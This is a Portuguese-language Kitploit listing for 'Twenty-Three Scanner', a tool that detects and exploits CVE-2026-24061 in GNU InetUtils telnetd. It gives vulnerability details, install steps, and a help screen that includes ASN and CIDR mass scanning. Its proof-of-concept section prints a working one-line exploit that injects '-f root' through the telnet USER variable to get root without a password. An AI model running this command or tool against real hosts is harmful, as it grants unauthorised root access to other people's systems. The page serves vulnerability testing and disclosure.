Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Twenty-Three-Scanner — CVE-2026-24061 - Bypass de Autenticação Remota no Telnetd do GNU InetUtils | Kitploit
Ferramentas/GitHubGitHub/madfxr/twenty-three-scanner
ReconhecimentoScanners de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança de RedeTestes de Penetração
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - Bypass de Autenticação Remota no Telnetd do GNU InetUtils

Ver Repositório
421há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛰️ Twenty-Three Scanner

Um scanner Poderoso, Rápido e Elegante para detectar serviços Telnetd vulneráveis afetados por CVE-2026-24061. Construído com a biblioteca padrão pura de Python - zero dependências externas necessárias.

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 Índice

  • ⚖️ Licença
  • 🧩 Recursos
  • ☣️ Detalhes da Vulnerabilidade
    • ⚡ Status do Serviço
    • 🧪 Prova de Conceito (PoC)
    • 💥 Versões Afetadas
    • 🧵 Versões Corrigidas
    • ⚔️ Vetor de Ataque
    • 🚨 Pontuação CVSS
  • 🛠️ Instalação
  • 📜 Uso
  • 🎯 Exemplos
  • ⚗️ Demonstrações
  • 📖 Referências

🧩 Recursos

  • 🚀 Varredura de Alto Desempenho – Arquitetura Multi-Threaded com Número Configurável de Threads.
  • 🌐 Entrada Flexível de Alvos – Suporte para IPs Únicos, Faixas CIDR, Consultas ASN e Listas Baseadas em Arquivos.
  • 📊 Progresso em Tempo Real – Interface Bonita Baseada em Unicode com Barras de Progresso ao Vivo.
  • 🤖 Inteligência ASN – Busca Automática de Prefixos nas APIs RADB, BGPView e HackerTarget.
  • 🌍 Inteligência de Localização GEO – Busca em Tempo Real de ASN, Provedor e Localização na API ipapi.
  • 💾 Interrupção Graciosa – Tratamento de CTRL+C com Salvamento Automático de Resultados.
  • 📝 Registro Detalhado – Níveis de Verbosidade Configuráveis para Depuração.
  • 🛡️ Varredura Segura – Limites Integrados para Prevenir Varreduras Massivas Acidentais.
  • 🎨 Saída Limpa – Tabelas Profissionais com Bordas e Resumos de Varredura.
  • 📦 Zero Dependências – Apenas Biblioteca Padrão Pura de Python 3.x.

☣️ Detalhes da Vulnerabilidade

CVE-2026-24061 é uma vulnerabilidade crítica de bypass de autenticação no Telnetd do GNU InetUtils que permite que atacantes remotos não autenticados obtenham acesso root explorando o tratamento da opção NEW-ENVIRON.


⚡ Status do Serviço

A seguir está a configuração do serviço Telnetd no lado do host alvo.

image


🧪 Prova de Conceito (PoC)

E aqui está a Prova de Conceito (PoC) para esta vulnerabilidade, que pode ser executada manualmente a partir do host do atacante simplesmente executando o comando USER="-f root" telnet -a <TARGET_HOST> 23.

image


💥 Versões Afetadas

  • GNU InetUtils >=1.9.3 <=2.7.
  • Várias distribuições embarcadas de Linux.
  • Dispositivos IoT com implementações vulneráveis de Telnetd.

🧵 Versões Corrigidas

  • GNU InetUtils >=2.8.

⚔️ Vetor de Ataque

A vulnerabilidade explora a validação inadequada da variável de ambiente USER na negociação da opção NEW-ENVIRON (RFC 1572) do telnet, permitindo que atacantes injetem valores maliciosos como -f root para contornar a autenticação.


🚨 Pontuação CVSS

9.8 (Crítico) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.


🛠️ Instalação

# Clone o Repositório
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Torne Executável
sudo chmod +x twenty-three-scanner.py

# Execute o Script
sudo python3 twenty-three-scanner.py -h

📜 Uso

A seguir está um manual para a ferramenta Twenty-Three Scanner que pode ser usada para detectar a vulnerabilidade CVE-2026-24061 - Bypass de Autenticação Remota no Telnetd do GNU InetUtils.

usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')

Timeout Options:
  --connect-timeout SEC
                        TCP connection timeout in seconds (default: 3.0)
  --read-timeout SEC    socket read timeout in seconds (default: 2.0)
  --id-timeout SEC      'id' command response timeout in seconds (default: 2.0)
Baixar ferramenta